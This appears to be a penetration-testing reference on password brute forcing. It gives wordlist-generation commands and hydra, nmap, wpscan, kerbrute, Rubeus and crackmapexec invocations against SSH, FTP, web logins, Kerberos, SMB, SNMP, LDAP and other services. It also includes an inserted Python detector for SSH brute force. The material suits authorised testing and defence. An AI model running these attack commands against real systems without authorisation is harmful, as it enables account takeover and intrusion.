Brute Forcing

Introduction

One way to gain access to a company's website, services, infrastructure or computers is through default or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".

Default credentials

Many web applications, services and devices ship with a default administrator account and a default password, and that password is often never changed after the device is set up. This gives an attacker the chance to look up the default credentials for that product and log in with them.

Identify the software, then check whether it ships with default passwords and, if so, what they are.

Dictionaries

If the default credentials for the target do not work, an attacker can use existing dictionaries of common passwords or craft a dictionary based on the password policy of the targeted company.

Existing dictionaries

Ready-made dictionaries containing thousands of passwords already exist.

Crafting dictionaries

Based on the information gathered about the target, we can craft personalised dictionaries, and several tools make this work easier for the attacker.

  • Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.

cewl <URL> --with-numbers -n -m 5 -d 3 -w output.txt
  • Crunch: you can specify a character set, and it will generate a huge number of permutations using the characters you specify.

# Generate every combination of length 5 to 8 from an alphanumeric character set
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789
  • Cupp: Generates passwords based on provided keywords about the target.

cupp -i

Attacks

This subsection contains commands to perform brute force attacks on different technologies.

FTP

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} ftp://<TARGET>

SSH

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}" <TARGET>
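As an added defender-side example, not part of the original notes, here is a small Python detector for the SSH guessing above: it parses constructed sshd auth.log lines (hostname, addresses and usernames are made up) and flags any source address that produces a burst of failed logins, reporting how many distinct usernames it tried.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log sample (hostname, addresses and usernames are made up).
SAMPLE_LOG = """\
Mar 14 10:01:02 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 50210 ssh2
Mar 14 10:01:03 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 50211 ssh2
Mar 14 10:01:04 bastion sshd[2103]: Failed password for root from 203.0.113.7 port 50212 ssh2
Mar 14 10:01:05 bastion sshd[2104]: Failed password for invalid user test from 203.0.113.7 port 50213 ssh2
Mar 14 10:01:06 bastion sshd[2105]: Failed password for root from 203.0.113.7 port 50214 ssh2
Mar 14 10:01:07 bastion sshd[2106]: Accepted publickey for deploy from 198.51.100.20 port 41000 ssh2
Mar 14 10:05:30 bastion sshd[2107]: Failed password for alice from 198.51.100.20 port 41002 ssh2
Mar 14 10:20:00 bastion sshd[2108]: Failed password for invalid user admin from 203.0.113.7 port 50300 ssh2
"""

# Matches "Failed password for <user>" and "Failed password for invalid user <user>".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_failures(log_text, year=2022):
    """Yield (timestamp, username, source_ip) per failed-password line.
    syslog timestamps carry no year, so the caller supplies one."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["src"]

def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Flag sources with >= threshold failures inside any window_seconds span.
    Returns {source_ip: (failures_in_window, sorted_usernames)}; many distinct
    usernames from one source suggests password spraying, not a single-account guess."""
    per_source = defaultdict(list)
    for ts, user, src in parse_failures(log_text):
        per_source[src].append((ts, user))
    flagged = {}
    for src, events in per_source.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span fits in window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u in events[start:end + 1]})
                flagged[src] = (end - start + 1, users)
                break
    return flagged
```

Tune window_seconds and threshold to the host's normal failure rate; a single lockout-safe threshold across a whole estate is what the SMB section's password-policy check is about from the other side.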

Web

An attacker could encounter different login portals during a web analysis that can be brute-forced.

Basic Authentication

hydra -I {-l <USER> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.TXT>} -f <IP> -s <PORT> http-get <URL>

POST Form Authentication

hydra {-l <USER> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.TXT>} <TARGET> -V http-form-post '<ENDPOINT>:<username=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS MESSAGE>'

Note: hydra currently does not support forms protected by CSRF tokens; in that case Burp Suite is an alternative.

WordPress

wpscan --url <WORDPRESS_URL> --passwords <WORDLIST.TXT> --usernames <USERS.TXT> --max-threads <NUMBER_THREADS>

Kerberos

There are several ways to perform a brute-force attack against a Kerberos service.

# with a list of users
python kerbrute.py -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users:<USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>

POP3

nmap -n -p110 --script pop3-brute <TARGET>
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V

SMB

First, check the password policy (lockout threshold and window) to avoid locking out accounts.

crackmapexec smb <IP> --pass-pol

Then you can brute-force with the following tools.

crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>

SNMP

You can brute-force SNMP community strings with hydra.

hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp

LDAP

The nmap ldap-brute script attempts to brute-force LDAP authentication. By default it uses its built-in username and password lists; to use your own, pass the userdb and passdb script arguments.

nmap --script ldap-brute -p 389 <IP>

Another option is to use hydra.

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>
